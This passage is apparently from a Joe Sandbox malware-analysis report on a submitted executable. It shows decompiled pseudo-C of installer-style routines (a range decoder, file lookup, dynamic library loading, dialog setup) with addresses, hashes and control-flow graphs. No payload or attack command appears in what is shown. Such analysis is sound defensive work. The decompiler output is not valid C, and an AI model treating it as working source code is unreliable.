                      							__ecx =  *(__ebp - 0x2c);
                      							 *(__ebp - 0x2c) = __eax;
                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      							L89:
                      							__eax =  *(__ebp - 4);
                      							 *(__ebp - 0x80) = 0x15;
                      							__eax =  *(__ebp - 4) + 0xa68;
                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      							goto L68;
                      						case 0xc:
                      							L99:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xc;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t334 = __ebp - 0x70;
                      							 *_t334 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t334;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							__eax =  *(__ebp - 0x2c);
                      							goto L101;
                      						case 0xd:
                      							goto L36;
                      						case 0xe:
                      							goto L45;
                      						case 0xf:
                      							goto L57;
                      						case 0x10:
                      							L109:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x10;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t365 = __ebp - 0x70;
                      							 *_t365 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t365;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							goto L111;
                      						case 0x11:
                      							L68:
                      							__esi =  *(__ebp - 0x58);
                      							 *(__ebp - 0x84) = 0x12;
                      							goto L132;
                      						case 0x12:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 0x58);
                      								 *(__ebp - 0x84) = 0x13;
                      								__esi =  *(__ebp - 0x58) + 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							__eflags = __eax;
                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                      							goto L130;
                      						case 0x13:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								_t469 = __ebp - 0x58;
                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                      								__eflags =  *_t469;
                      								 *(__ebp - 0x30) = 0x10;
                      								 *(__ebp - 0x40) = 8;
                      								L144:
                      								 *(__ebp - 0x7c) = 0x14;
                      								goto L145;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							 *(__ebp - 0x30) = 8;
                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      							L130:
                      							 *(__ebp - 0x58) = __eax;
                      							 *(__ebp - 0x40) = 3;
                      							goto L144;
                      						case 0x14:
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      							__eax =  *(__ebp - 0x80);
                      							goto L140;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      							goto L120;
                      						case 0x16:
                      							__eax =  *(__ebp - 0x30);
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx =  *(__ebp - 4);
                      							 *(__ebp - 0x40) = 6;
                      							__eax = __eax << 7;
                      							 *(__ebp - 0x7c) = 0x19;
                      							 *(__ebp - 0x58) = __eax;
                      							goto L145;
                      						case 0x17:
                      							L145:
                      							__eax =  *(__ebp - 0x40);
                      							 *(__ebp - 0x50) = 1;
                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      							goto L149;
                      						case 0x18:
                      							L146:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x18;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t484 = __ebp - 0x70;
                      							 *_t484 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t484;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L148:
                      							_t487 = __ebp - 0x48;
                      							 *_t487 =  *(__ebp - 0x48) - 1;
                      							__eflags =  *_t487;
                      							L149:
                      							__eflags =  *(__ebp - 0x48);
                      							if( *(__ebp - 0x48) <= 0) {
                      								__ecx =  *(__ebp - 0x40);
                      								__ebx =  *(__ebp - 0x50);
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      								__eax =  *(__ebp - 0x7c);
                      								 *(__ebp - 0x44) = __ebx;
                      								goto L140;
                      							}
                      							__eax =  *(__ebp - 0x50);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      							__eax =  *(__ebp - 0x58);
                      							__esi = __edx + __eax;
                      							 *(__ebp - 0x54) = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								 *(__ebp - 0x50) = __edx;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L148;
                      							} else {
                      								goto L146;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								 *(__ebp - 0x2c) = __ebx;
                      								L119:
                      								_t393 = __ebp - 0x2c;
                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                      								__eflags =  *_t393;
                      								L120:
                      								__eax =  *(__ebp - 0x2c);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      									goto L170;
                      								}
                      								__eflags = __eax -  *(__ebp - 0x60);
                      								if(__eax >  *(__ebp - 0x60)) {
                      									goto L171;
                      								}
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      								__eax =  *(__ebp - 0x30);
                      								_t400 = __ebp - 0x60;
                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      								__eflags =  *_t400;
                      								goto L123;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							 *(__ebp - 0x2c) = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								 *(__ebp - 0x48) = __ecx;
                      								L102:
                      								__eflags =  *(__ebp - 0x48);
                      								if( *(__ebp - 0x48) <= 0) {
                      									__eax = __eax + __ebx;
                      									 *(__ebp - 0x40) = 4;
                      									 *(__ebp - 0x2c) = __eax;
                      									__eax =  *(__ebp - 4);
                      									__eax =  *(__ebp - 4) + 0x644;
                      									__eflags = __eax;
                      									L108:
                      									__ebx = 0;
                      									 *(__ebp - 0x58) = __eax;
                      									 *(__ebp - 0x50) = 1;
                      									 *(__ebp - 0x44) = 0;
                      									 *(__ebp - 0x48) = 0;
                      									L112:
                      									__eax =  *(__ebp - 0x40);
                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      										_t391 = __ebp - 0x2c;
                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      										__eflags =  *_t391;
                      										goto L119;
                      									}
                      									__eax =  *(__ebp - 0x50);
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      									__eax =  *(__ebp - 0x58);
                      									__esi = __edi + __eax;
                      									 *(__ebp - 0x54) = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      									__eflags =  *(__ebp - 0xc) - __edx;
                      									if( *(__ebp - 0xc) >= __edx) {
                      										__ecx = 0;
                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      										__ecx = 1;
                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      										__ebx = 1;
                      										__ecx =  *(__ebp - 0x48);
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx =  *(__ebp - 0x44);
                      										__ebx =  *(__ebp - 0x44) | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										 *(__ebp - 0x44) = __ebx;
                      										 *__esi = __ax;
                      										 *(__ebp - 0x50) = __edi;
                      									} else {
                      										 *(__ebp - 0x10) = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                      									if( *(__ebp - 0x10) >= 0x1000000) {
                      										L111:
                      										_t368 = __ebp - 0x48;
                      										 *_t368 =  *(__ebp - 0x48) + 1;
                      										__eflags =  *_t368;
                      										goto L112;
                      									} else {
                      										goto L109;
                      									}
                      								}
                      								__ecx =  *(__ebp - 0xc);
                      								__ebx = __ebx + __ebx;
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      									__ecx =  *(__ebp - 0x10);
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									 *(__ebp - 0x44) = __ebx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									L101:
                      									_t338 = __ebp - 0x48;
                      									 *_t338 =  *(__ebp - 0x48) - 1;
                      									__eflags =  *_t338;
                      									goto L102;
                      								} else {
                      									goto L99;
                      								}
                      							}
                      							__edx =  *(__ebp - 4);
                      							__eax = __eax - __ebx;
                      							 *(__ebp - 0x40) = __ecx;
                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      							goto L108;
                      						case 0x1a:
                      							goto L55;
                      						case 0x1b:
                      							L75:
                      							__eflags =  *(__ebp - 0x64);
                      							if( *(__ebp - 0x64) == 0) {
                      								 *(__ebp - 0x88) = 0x1b;
                      								goto L170;
                      							}
                      							__eax =  *(__ebp - 0x14);
                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      							__eflags = __eax -  *(__ebp - 0x74);
                      							if(__eax >=  *(__ebp - 0x74)) {
                      								__eax = __eax +  *(__ebp - 0x74);
                      								__eflags = __eax;
                      							}
                      							__edx =  *(__ebp - 8);
                      							__cl =  *(__eax + __edx);
                      							__eax =  *(__ebp - 0x14);
                      							 *(__ebp - 0x5c) = __cl;
                      							 *(__eax + __edx) = __cl;
                      							__eax = __eax + 1;
                      							__edx = 0;
                      							_t274 = __eax %  *(__ebp - 0x74);
                      							__eax = __eax /  *(__ebp - 0x74);
                      							__edx = _t274;
                      							__eax =  *(__ebp - 0x68);
                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      							_t283 = __ebp - 0x64;
                      							 *_t283 =  *(__ebp - 0x64) - 1;
                      							__eflags =  *_t283;
                      							 *( *(__ebp - 0x68)) = __cl;
                      							goto L79;
                      						case 0x1c:
                      							while(1) {
                      								L123:
                      								__eflags =  *(__ebp - 0x64);
                      								if( *(__ebp - 0x64) == 0) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__edx =  *(__ebp - 8);
                      								__cl =  *(__eax + __edx);
                      								__eax =  *(__ebp - 0x14);
                      								 *(__ebp - 0x5c) = __cl;
                      								 *(__eax + __edx) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t414 = __eax %  *(__ebp - 0x74);
                      								__eax = __eax /  *(__ebp - 0x74);
                      								__edx = _t414;
                      								__eax =  *(__ebp - 0x68);
                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      								__eflags =  *(__ebp - 0x30);
                      								 *( *(__ebp - 0x68)) = __cl;
                      								 *(__ebp - 0x14) = __edx;
                      								if( *(__ebp - 0x30) > 0) {
                      									continue;
                      								} else {
                      									goto L80;
                      								}
                      							}
                      							 *(__ebp - 0x88) = 0x1c;
                      							goto L170;
                      					}
                      				}
                      			}













                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                      • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 630 405d7c-405d90 FindFirstFileA 631 405d92-405d9b FindClose 630->631 632 405d9d 630->632 633 405d9f-405da0 631->633 632->633
                      C-Code - Quality: 100%
                      			E00405D7C(CHAR* _a4) {
                      				void* _t2;
                      
                      				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                      				if(_t2 == 0xffffffff) {
                      					return 0;
                      				}
                      				FindClose(_t2);
                      				return 0x4224e8;
                      			}

                      APIs
                      • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405D87
                      • FindClose.KERNEL32(00000000), ref: 00405D93
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID: $B
                      • API String ID: 2295610775-2366330246
                      • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                      • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405DA3(signed int _a4) {
                      				struct HINSTANCE__* _t5;
                      				CHAR* _t7;
                      				signed int _t9;
                      
                      				_t9 = _a4 << 3;
                      				_t7 =  *(_t9 + 0x409218);
                      				_t5 = GetModuleHandleA(_t7);
                      				if(_t5 != 0) {
                      					L2:
                      					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                      				}
                      				_t5 = LoadLibraryA(_t7); // executed
                      				if(_t5 != 0) {
                      					goto L2;
                      				}
                      				return _t5;
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: AddressHandleLibraryLoadModuleProc
                      • String ID:
                      • API String ID: 310444273-0
                      • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                      • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 149 4037d3-4037d6 138->149 150 4037db-4037e6 call 403897 138->150 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 153 4036dc-4036e6 GetFileAttributesA 147->153 149->144 161 403864-40386c call 404ef5 150->161 162 4037e8-403805 ShowWindow LoadLibraryA 150->162 156 4036e8-4036ea 153->156 157 4036ec-4036ed call 4055bf 153->157 156->146 156->157 157->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->149 174 40387a-403881 call 40140b 171->174 174->149
                      C-Code - Quality: 96%
                      			E004035E3() {
                      				intOrPtr _v4;
                      				intOrPtr _v8;
                      				int _v12;
                      				int _v16;
                      				char _v20;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t20;
                      				signed int _t24;
                      				void* _t28;
                      				void* _t30;
                      				int _t31;
                      				void* _t34;
                      				struct HINSTANCE__* _t37;
                      				int _t38;
                      				intOrPtr _t39;
                      				int _t42;
                      				intOrPtr _t59;
                      				char _t61;
                      				CHAR* _t63;
                      				signed char _t67;
                      				struct HINSTANCE__* _t75;
                      				CHAR* _t78;
                      				intOrPtr _t80;
                      				CHAR* _t85;
                      
                      				_t80 =  *0x423eb0; // 0x4de368
                      				_t20 = E00405DA3(6);
                      				_t87 = _t20;
                      				if(_t20 == 0) {
                      					_t78 = 0x420498;
                      					"1033" = 0x7830;
                      					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                      					__eflags =  *0x420498;
                      					if(__eflags == 0) {
                      						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                      					}
                      					lstrcatA("1033", _t78);
                      				} else {
                      					E004059E3("1033",  *_t20() & 0x0000ffff);
                      				}
                      				E00403897(_t75, _t87);
                      				_t24 =  *0x423eb8; // 0x80
                      				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                      				 *0x423f20 = _t24 & 0x00000020;
                      				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                      					L16:
                      					if(E00405659(_t95, _t84) == 0) {
                      						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                      					}
                      					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                      					 *0x423688 = _t28;
                      					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                      						L21:
                      						if(E0040140B(0) == 0) {
                      							_t30 = E00403897(_t75, __eflags);
                      							__eflags =  *0x423f40; // 0x0
                      							if(__eflags != 0) {
                      								_t31 = E00404EF5(_t30, 0);
                      								__eflags = _t31;
                      								if(_t31 == 0) {
                      									E0040140B(1);
                      									goto L33;
                      								}
                      								__eflags =  *0x42366c; // 0x0
                      								if(__eflags == 0) {
                      									E0040140B(2);
                      								}
                      								goto L22;
                      							}
                      							ShowWindow( *0x420470, 5);
                      							_t37 = LoadLibraryA("RichEd20");
                      							__eflags = _t37;
                      							if(_t37 == 0) {
                      								LoadLibraryA("RichEd32");
                      							}
                      							_t85 = "RichEdit20A";
                      							_t38 = GetClassInfoA(0, _t85, 0x423640);
                      							__eflags = _t38;
                      							if(_t38 == 0) {
                      								GetClassInfoA(0, "RichEdit", 0x423640);
                      								 *0x423664 = _t85;
                      								RegisterClassA(0x423640);
                      							}
                      							_t39 =  *0x423680; // 0x0
                      							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                      							E0040140B(5);
                      							return _t42;
                      						}
                      						L22:
                      						_t34 = 2;
                      						return _t34;
                      					} else {
                      						_t75 =  *0x423ea0; // 0x400000
                      						 *0x423654 = _t28;
